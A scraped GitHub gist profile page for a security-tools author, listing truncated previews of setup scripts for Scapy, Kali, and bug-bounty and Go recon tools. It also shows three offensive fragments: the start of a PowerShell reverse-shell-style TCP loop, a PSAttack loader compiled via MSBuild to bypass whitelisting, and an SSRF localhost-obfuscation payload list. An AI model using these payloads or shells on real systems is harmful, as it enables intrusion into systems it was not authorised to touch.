Skip to content

Instantly share code, notes, and snippets.

View ResistanceIsUseless's full-sized avatar
:octocat:
Building Security Tools

StaticBunny ResistanceIsUseless

:octocat:
Building Security Tools
View GitHub Profile

Keybase proof

I hereby claim:

  • I am resistanceisuseless on github.
  • I am matthewgriffiths (https://keybase.io/matthewgriffiths) on keybase.
  • I have a public key ASD0g5wpxTHB7qHZ-T54myUl8i6hk6Z1CoGM_5v0-kkLXAo

To claim this, I am signing this object:

@ResistanceIsUseless
ResistanceIsUseless / install_scapy.sh
Last active August 29, 2015 14:05 — forked from nvasilakis/install_scapy.sh
OSX Scapy Install Script
#!/bin/bash
#requires wget(brew install wget) or replace wget with curl -I
wget http://libdnet.googlecode.com/files/libdnet-1.12.tgz
tar xfz libdnet-1.12.tgz
cd libdnet-1.12
./configure
make
sudo make install
cd python
sudo python setup.py install
@ResistanceIsUseless
ResistanceIsUseless / kali-raspi-config.sh
Created September 22, 2014 19:00
packages for raspi-config for kali linux
wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20140902-1_all.deb
wget http://http.us.debian.org/debian/pool/main/l/lua5.1/lua5.1_5.1.5-4_armel.deb
wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armel.deb
dpkg -i raspi-config_20140902-1_all.deb
dpkg -i lua5.1_5.1.5-4_armel.deb
dpkg -i raspi-config_20121028_all.deb
#http://rageweb.info/2013/03/21/raspi-config-in-kali/
http://bluez.sourceforge.net/contrib/HOWTO-PAN
https://github.com/raspberrypi/firmware/blob/master/boot/overlays/README
https://askubuntu.com/questions/2573/can-i-use-my-computer-as-an-a2dp-receiver-bluetooth-speaker
https://wiki.debian.org/BluetoothUser
https://support.hifiberry.com/hc/en-us/articles/205377651-Configuring-Linux-4-x-or-higher
https://www.linux.com/learn/weekend-project-personal-area-networking-bluetooth
http://www.instructables.com/id/Multiroom-Client-With-Raspberry-Pi-ZERO-and-PHAT-D/
http://www.instructables.com/id/Turn-your-Raspberry-Pi-into-a-Portable-Bluetooth-A/
mode apt.list
annotate match apt.package -- apt-cache pkgnames
bindkey enter apt.package apt.list -- apt-cache show %(apt.package)
bindkey d apt.package apt.list -- apt-cache depends %(apt.package)
bindkey s apt.package apt.list -- apt-cache search %(apt.package)
bindkey R apt.package apt.list -- apt-get remove %(apt.package) --assume-yes
bindkey I apt.package apt.list -- !?apt-get install %(apt.package) --assume-yes
end
@ResistanceIsUseless
ResistanceIsUseless / bountyscan_setup.sh
Last active March 8, 2023 12:44 — forked from jhaddix/bountyscan_setup.sh
Bug bounty environment setup with some additional tools
#!/bin/bash
#note: This is a pretty sloppy script in someplaces so use at your own risk.
########################################
# Configuration
########################################
InstallPath=/home/static/Tools
########################################
mkdir -p $InstallPath/{temp,Scripts/Recon}
echo -e "\e[92m[*] Starting Install... [*]"
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
@ResistanceIsUseless
ResistanceIsUseless / PSA64.cs
Created February 24, 2020 18:49 — forked from NickTyrer/PSA64.cs
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;
namespace PSA64
{
class Program
{
########################################
# Configuration
########################################
#Install Path needs /Scripts/Recon
InstallPath=/home/static/Tools
########################################
echo -e "\e[92m[*] Install Go Packages [*]"
#Aquatone Website Image Snapshot - https://michenriksen.com/blog/aquatone-now-in-go/
go get -u "github.com/michenriksen/aquatone"
@ResistanceIsUseless
ResistanceIsUseless / ssrf-host.txt
Last active March 13, 2024 17:24
SSRF Payloads
127.0.0.1
127.0.1.3
0
127.1
127.0.1
localhost
1.0.0.127.in-addr.arpa
01111111000000000000000000000001
0x7f.0x0.0x0.0x1
0177.0.0.01